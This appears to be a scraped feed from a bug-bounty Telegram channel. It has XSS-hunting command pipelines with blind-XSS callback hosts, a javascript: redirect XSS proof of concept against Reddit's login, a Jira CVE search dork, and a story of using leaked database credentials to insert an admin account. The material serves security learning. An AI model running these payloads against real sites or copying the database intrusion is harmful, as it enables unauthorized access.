Hey Hunters,
DarkShadow here—back again with a quick drop!
If you're using revshells.com and you're tired of testing payloads one by one to get a reverse shell, check out this custom script I created. With just a single command, you can instantly get a reverse shell—no more manual payload hunting!
Let me know if you need👀
🔥19👍7🐳2
More tools, tips, and hacking content coming your way!
Stay connected with us — the journey has just begun.
Don’t forget to like and share!
2👍25❤11🔥4
Hey Hunters,
DarkShadow here back again, dropping some one-liner killer XSS commands😉
Cleaned XSS Payload Hunting Commands:
1. Wayback + httpx + GF + Dalfox
cat domains.txt | httpx -silent -ports 80,443,8080,8443,3000,8000 | waybackurls | grep "=" | uro | gf xss | qsreplace '"><script>alert(1)</script>' | while read url; do curl -s "$url" | grep -q "<script>alert(1)</script>" && echo "[XSS] $url"; done
2. Gospider + Dalfox
gospider -S URLS.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -oP "https?://[^ ]+" | grep "=" | qsreplace -a | dalfox pipe
3. Wayback + GF + Blind XSS via Dalfox
waybackurls target.com | gf xss | sed 's/=.*/=/' | sort -u | dalfox -b yoursubdomain.xss.ht pipe
4. Gospider + Dalfox (Deep Crawl)
gospider -S targets.txt -c 20 -d 3 --js --sitemap --robots | grep -oP "https?://[^\s']+" | grep "=" | uro | dalfox pipe -o gospider_xss.txt
5. Dalfox Direct with Blind XSS
cat urls.txt | dalfox pipe -b yourdomain.xss
Required tools are:
httpx, waybackurls, uro, gf, qsreplace, curl, gospider, dalfox
If you find this helpful and want more cutting-edge tips and tricks, don’t forget to follow me 👉🏼 DarkShadow
#bugbountytips #xss
🔥13👍7👏5👨💻3
Good morning hackers,
Let's start the morning by hacking a Reddit account 😉
😁11🫡2
Hey Hunters,
DarkShadow here, back again dropping an old-school Reddit XSS PoC for you to check out!
Let’s break it down and understand the logic behind the vulnerability.
Vulnerable Parameter: ?dest=
What does the dest parameter do?
The dest parameter is commonly used in login flows to redirect users after successful authentication. For example:
A user tries to access a protected page.
Reddit redirects them to:
/login/?dest=/protected/resource
After login, the site redirects them to the original dest URL.
Sounds fine, right? But here’s the twist...
✅ PoC Steps (Super Simple):
https://www.reddit.com/login/?dest=javascript:alert(document.domain)
Boom💥. That’s it.
Just throw that URL and watch the magic happen. No need for complex encoding or obfuscation — just a mindset shift.
Keep your payloads sharp and your eyes sharper.
Don’t forget to react, share, and follow me on X
👉🏼 DarkShadow
#bugbountytips #xss
👏18👍10🔥7🗿4❤2
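The defensive side of the dest= flow described in the post above, as an added example that is not part of the original post and is not Reddit's code. The function names, APP_ORIGIN and the sample inputs are hypothetical; it contrasts handing the raw parameter to the redirect with resolving it against the site's own origin first.

```javascript
// Added example: hypothetical helper names, not code from Reddit or the post.
const APP_ORIGIN = "https://app.example"; // assumed origin of the login page
const FALLBACK = "/";                     // where to go when dest is rejected

// Vulnerable pattern: the raw value is handed to the navigation sink.
// With dest=javascript:alert(document.domain) the browser runs script
// in the login page's origin instead of navigating.
function unsafeTarget(query) {
  return new URLSearchParams(query).get("dest") || FALLBACK;
}

// Hardened pattern: resolve dest against our own origin, then accept it only
// if the result is still https on the same origin. Return a rebuilt path,
// never the caller's original string.
function safeTarget(query) {
  const dest = new URLSearchParams(query).get("dest");
  if (!dest) return FALLBACK;
  // Backslashes and control characters are normalised differently by
  // browsers and servers, so reject them outright.
  if (/[\\\u0000-\u001f\u007f]/.test(dest)) return FALLBACK;
  let url;
  try {
    url = new URL(dest, APP_ORIGIN);
  } catch {
    return FALLBACK;
  }
  if (url.protocol !== "https:" || url.origin !== APP_ORIGIN) return FALLBACK;
  return url.pathname + url.search + url.hash;
}

// Constructed sample inputs: the post's PoC plus common variants.
const samples = [
  "?dest=/protected/resource",
  "?dest=javascript:alert(document.domain)",
  "?dest=//evil.example/x",
  "?dest=https://evil.example/",
  "?dest=%09javascript:alert(1)",
  "?dest=/\\evil.example",
];
for (const q of samples) {
  console.log(q.padEnd(42), "unsafe:", unsafeTarget(q), "| safe:", safeTarget(q));
}
```

Only the first sample survives safeTarget; every other input falls back to "/".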
Who are you in the world of cybersecurity?
Anonymous Poll
42%: Beginner — currently learning cybersecurity 👀
25%: Bug bounty hunter — actually reporting vulnerabilities 🔥
7%: Red teamer — simulating real-world attacks to improve defenses 💥
15%: Professional Pentester – Working in a cybersecurity job role ✨
11%: Black hat hacker — unauthorized hacking ☠️
🔥11🐳8❤1👍1
Hey Hunters,
DarkShadow here back again, dropping a killer trick 🌀
Before testing a file upload vulnerability, test the filename parameter.
Don't forget to show your love, and follow me 👉🏼 DarkShadow
🔥22👍7❤3👏3🐳1👨💻1🫡1
https://github.com/NazaninNazari/Origin_Recon
👍19🔥10
Forwarded from Brut Security 2.0
🔥10
CVE-2025-22157: Improper Access Control in Atlassian Jira, 7.2 rating❗️
The vulnerability allows authenticated attackers to escalate their privileges to administrator level or gain access to restricted workflows in Jira.
Search at Netlas.io:
👉 Link: https://nt.ls/lVuft
👉 Dork: http.meta:"content=\"JIRA\""
Vendor's advisory: https://confluence.atlassian.com/security/security-bulletin-may-20-2025-1561365992.html
🔥6👍2
The heavy recon features? Still cooking.
🔗 addons.mozilla.org/addon/brutscope-extractor
❤24👍5
https://github.com/sw33tLie/uff
🔥9👍3
Why are there no reactions 🙂?
Do let us know what content you guys are looking for 👀
❤34😢5👍3🤝3😁1
🔥 Tried something new! Just dropped a quick guide on rooting Android Emulator + setting up Burp Suite for HTTPS interception.
✅ Manual setup
✅ Magisk + rootAVD
✅ Trusted Burp cert
✅ Meme vibes included 😎
📖 Read here: https://medium.com/p/how-to-root-your-android-emulator-hack-yourself-with-burp-suite-manually-like-a-legend-ef4fbe28ceab
1🔥23❤8
Hey Hunters,
DarkShadow here back again—sorry for the delay, I’ve been a little sick. Please keep me in your prayers.
Anyway, just dropping a trick on how an out-of-scope target can lead to an in-scope critical vulnerability!
The story starts from a normal endpoint. When I clicked it, it redirected me somewhere else, and after resolving something, it returned the content. To check further what’s going on, I opened the request in Burp Suite. The endpoint performed a 302 redirect to an external domain, which was out of scope.
But here’s the twist—it was still showing the content from the original website I had requested. So I thought, maybe it’s working like a proxy?
Here comes the real mastery. Most bug hunters ignore this kind of behavior, but I decided to dig deeper. And yeah, I found a file: backup.zip
I instantly unzipped it and noticed a config/ folder, and inside it—a config.php file.
Guess what?
I found MySQL database credentials, and the most interesting part? The database URL was publicly accessible—not just localhost!
I tried connecting… and boom! I was successfully connected.
But wait—this domain is out of scope, right?
That’s what I thought too… until I started reading their massive database and was shocked—
It was the target's database, exposed through their proxy server, which had the hardcoded credentials in the config file.
At that moment, I was really excited.
Then I thought: What if I create a new user with admin role?
So I did exactly that—added an admin user to the database.
Now, on the target website, there’s a normal login page (not labeled as admin login), but I tried logging in with the new credentials and guess what?
BOOM! 💥
It logged me into the admin dashboard.
And just like that, I turned an out-of-scope target into a critical in-scope auth bypass vulnerability.✅
So guys, if you enjoyed this method, don’t forget to show some love—and please, pray for me, I’m really sick right now.
And don’t forget to follow me on X (Twitter): x.com/Darkshadow2bd
#bugbountytips #infosec
👏20❤10👍5😱4
https://powerade.com.s3.amazonaws.com/index.html
Guys, let's see whose explanation is better!
What is the impact after taking over an in-scope target S3 bucket? 🤔
👍11🔥5❤1🗿1